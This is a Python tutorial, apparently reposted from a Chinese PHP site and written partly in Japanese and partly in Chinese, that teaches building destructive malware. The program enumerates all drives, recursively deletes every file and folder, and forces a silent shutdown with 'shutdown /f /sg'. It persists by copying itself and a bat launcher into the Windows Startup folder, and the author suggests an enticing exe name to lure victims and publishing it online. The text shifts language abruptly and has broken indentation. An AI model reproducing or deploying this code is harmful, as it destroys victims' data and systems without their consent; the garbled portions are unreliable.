Python を使用して、ワンクリックですべてのディスク ファイルを削除し、自動的にシャットダウンしてバックドアを残します

今日私たちがやろうとしているケースは、Python を使用してハッカー ソフトウェアを作成する方法です。

ご存知のとおり、ハッカーがオペレーティング システムをハッキングするために最もよく使用する方法は、トロイの木馬クライアントを送信してシステム レジストリを変更することです。

グループ ポリシーに基づいて起動許可を取得し、コンピュータに侵入し、コンピュータのファイルを変更して不正な目的を達成します。

今日は最も基本的な起動方法についてお話しますが、まずシステムの起動項目のフォルダーにファイルを追加する基本的な手順を説明します。もちろん、より高度なポイントを使用することもできますが、ここでは説明しませんので、レジストリを使用して追加します。さて、本題に入りましょう。 。 。 。 。 。

#/実装手順/

まずソーシャルエンジニアリングによる分析を行い、一目見ただけでクリックしたくなる魅力的なexeファイル名を用意し、他の人がクリックした後、このプログラムはレスポンシブであれば、プログラムをさらに数回クリックする人もいるかもしれませんが、もちろん、これはプログラムに影響を与えません。見てみましょう:

最初にシステム ドライブ文字を取得する必要があります。このために、os モジュールを使用して、環境の辞書キー値を通じて現在のシステム ドライブ文字を取得できます。変数。

import os
print(os.getenv('SystemDrive'))

得到盘符后我们先可以将他的目录下的文件和文件夹打印出来

aa=os.getenv('SystemDrive')
os.chdir(aa+'\\\\') \#修改当前目录
os.system('tree\>\>1.txt') 打印树形目录并将其结果保存到1.txt文件中

然后我们只需要删除盘符下的文件夹和文件即可

所以我们需要用到 os 的walk遍历当前盘符下的所有文件，然后使用remove方法和rmdir方法,一个是删除文件另一个是删除目录

好了。我们开始吧,由于没有虚拟机于是自己创建一个目录放了若干文件夹和文件，效果都一样

path = r"C:\\Users\\Administrator\\Desktop\\sa"

os.walk() 方法用于通过在目录树中游走输出在目录中的文件名，向上或者向下。

os.walk()方法是一个简单易用的文件、目录遍历器，可以帮助我们高效的处理文件、目录方面的事情。

语法：

os.walk(top[, topdown=True[, onerror=None[, followlinks=False]]])

参数：

top -- 根目录下的每一个文件夹(包含它自己), 产生3-元组 (dirpath, dirnames,filenames) 【文件夹路径, 文件夹名字, 文件名】。

topdown --可选，为True或者没有指定,一个目录的的3-元组将比它的任何子文件夹的3-元组先产生 (目录自上而下)。

如果topdown为 False, 一个目录的3-元组将比它的任何子文件夹的3-元组后产生(目录自下而上)。

onerror -- 可选，是一个函数; 它调用时有一个参数,一个OSError实例。报告这错误后，继续walk,

或者抛出exception终止walk。

for root,dirs,files in os.walk(path,topdown=False):
    \#遍历目录
    for name in files:
        os.remove(os.path.join(root, name))


    for name in dirs:
        os.rmdir(os.path.join(root, name))

其实还有一种方法，就是shutil.rmtree(path)，但是它会删除目录本身及所有子文件夹和文件，也就是说他会删除sa这个目录，所以不推荐这种搞法，因为我们要删除的是盘符下的文件夹或者文件，这样做很容易导致未知的错误

得到了系统盘符之后，我们还想得到系统其它盘符那该怎么办了，不着急，我们可以试试下面这种方法。

import os
import string


def get_pan():
    disk_list=[] \#磁盘盘符列表
    for p in string.ascii_uppercase: \#遍历所有大写字母
    disk=p+':'
    if os.path.isdir(disk): \#看磁盘盘符名用了哪些大写字母开头
            disk_list.append(disk) \#添加到盘符列表
    return disk_list
print(get_pan()) #打印盘符

结果很完美，跟我预想的一模一样，连u盘盘符也打印出来了~

光打印一个磁盘目录文件好像显得有点美中不足，于是我决定吧所有磁盘目录文件都整出来，老样子，还是树形结构。

这样每个盘的目录结构就都保存在对应盘的2.txt文件中了。

然后我们将会把这些盘符下的目录文件全部删除，当然遍历删除啦，为了模拟真实场景我决定用几个带有多层文件和目录的文件夹来代替盘符，这里我就不一一截图了，直接上代码，老样子

g=['C:\\\\Users\\\\Administrator\\\\Desktop\\\\sa\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\qq\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\sq\\\\']


for y in g:
    for root, dirs, files in os.walk(y,topdown=False):\#遍历目录
        for name in files:
            os.remove(os.path.join(root, name))
        for name in dirs:
            os.rmdir(os.path.join(root, name))

ok，我们已经将文件及目录全部删除。

删除文件后了系统自然无法正常运行，于是这个时候我们可以使电脑关机，shutdown ，我的不二选择，它的方法有很多，用法如下:

shutdown [/i | /l | /s | /sg | /r | /g | /a | /p | /h | /e | /o][/hybrid] [/soft] [/fw] [/f]
/m \computer[/d [p|u:]xx:yy [/c “comment”]]

没有参数 显示帮助。这与键入 /? 是一样的。

/? 显示帮助。这与不键入任何选项是一样的。
/i 显示图形用户界面(GUI)。这必须是第一个选项。
/l 注销。这不能与 /m 或 /d 选项一起使用。
/s 关闭计算机。
/sg 关闭计算机。在下一次启动时，重启任何注册的应用程序。
/r 完全关闭并重启计算机。
/g 完全关闭并重新启动计算机。在重新启动系统后，重启任何注册的应用程序。
/a 中止系统关闭。这只能在超时期间使用。
与 /fw 结合使用，以清除任何未完成的至固件的引导。
/p 关闭本地计算机，没有超时或警告。可以与 /d 和 /f 选项一起使用。
/h 休眠本地计算机。可以与 /f 选项一起使用。
/hybrid 执行计算机关闭并进行准备以快速启动。必须与 /s 选项一起使用。
/fw 与关闭选项结合使用，使下次启动转到固件用户界面。
/e 记录计算机意外关闭的原因。
/o 转到高级启动选项菜单并重新启动计算机。
必须与 /r 选项一起使用。
/m \\computer 指定目标计算机。
/t xxx 将关闭前的超时时间设置为 xxx 秒。
有效范围是 0-315360000 (10 年)，默认值为 30。
如果超时时间大于 0，则默示为/f 参数。
/c "comment" 有关重新启动或关闭的原因的注释。最多允许 512 个字符。
/f 强制关闭正在运行的应用程序而不事先警告用户。
如果为 /t 参数指定大于 0 的值，则默示为 /f 参数。
/d [p|u:]xx:yy 提供重新启动或关闭的原因。
p 指示重启或关闭是计划内的。
u 指示原因是用户定义的。
如果未指定 p 也未指定 u，则重新启动或关闭是计划外的。
xx 是主要原因编号(小于 256 的正整数)。
yy 是次要原因编号(小于 65536 的正整数)。

所以我们得调用os.popen('shutdown /f /sg')，这样就可以在没有任何提示下关机了，神不知鬼不觉，哈哈哈，当然这个操作得是基于文件操作结束后进行的,再次进行优化

g=['C:\\\\Users\\\\Administrator\\\\Desktop\\\\sa\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\qq\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\sq\\\\']


for y in g:
  try:
          #遍历目录
          for root, dirs, files in os.walk(y,topdown=False):
              for name in files:
                  os.remove(os.path.join(root, name))
              for name in dirs:
                  os.rmdir(os.path.join(root, name))
                  time.sleep(1)
  
  except Exception:
          pass
  
  finally:
          os.popen('shutdown /f /sg')\#不弹出黑窗口

我们把程序发到网上运气好别人点击了，得让那个文件在自启动目录然后每次开机那个程序才会跟着启动啊，但是你想让别人把那个文件放到启动目录里去，做梦呢？这些操作当然交给万能的Python就能一步搞定啦。我们可以在点击这个文件之后快速生成一个bat文件和一个EXE文件或者Python文件。

在这里我以Python 和bat为主，因为我还没打包的缘故。

自启动目录路径：
C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
import shutil
shutil.copyfile('gc.py',r'C:\\ProgramData\\Microsoft\\Windows\\Start
Menu\\Programs\\StartUp\\gc1.py')

在这里我们用到shutil这个模块，专门操作文件目录的Copyfile方法是将当前资源文件复制到另一个目录下的文件，但是需要注意一点的是，两个文件名不可一样，否则会报错，虽然它可以复制，如果你非得用这个方法，记得抛异常。好了，现在可以了：

然后我们还需要一个bat来启动它，因为没有bat它是需要借助外力去点击才有效果的，有了bat就可以自动启动。

建立一个后缀为bat的文件，内容如下：

＃＃＃＃＃＃同じ。バット ファイルをインテリジェントに生成するには Python が必要です。それでは、どうやって記述するのですか? それは非常に簡単です。誰かが私に、なぜ pythow が Python ではないのかと尋ねました。前者を実行した後に黒いウィンドウが表示されないからです。もちろん、削除後に呼び出され、ファイルがすべて削除された後、どれを保持することに何の意味があるのか​​と誰かが私に尋ねました。はははは、娯楽のためとしか言えません。 。 。

本題に戻りますが、プログラムファイルは1つ作成するだけでOKです。

完了しても、Python ファイルをパッケージ化して、bat ファイルに含めることもできます。一部のターゲット コンピューターには Python 環境がない可能性があるため、インタープリターを作成する必要はありません。この場合、pyinstaller を使用してパッケージ化する必要があります。パッケージ化したら、bat ファイルの内容を gc.exe が起動するように変更するだけです。

exe ファイルにパッケージ化した後、オンラインで公開して X をインストールできます、ははは~

以上がPython を使用して、ワンクリックですべてのディスク ファイルを削除し、自動的にシャットダウンしてバックドアを残しますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。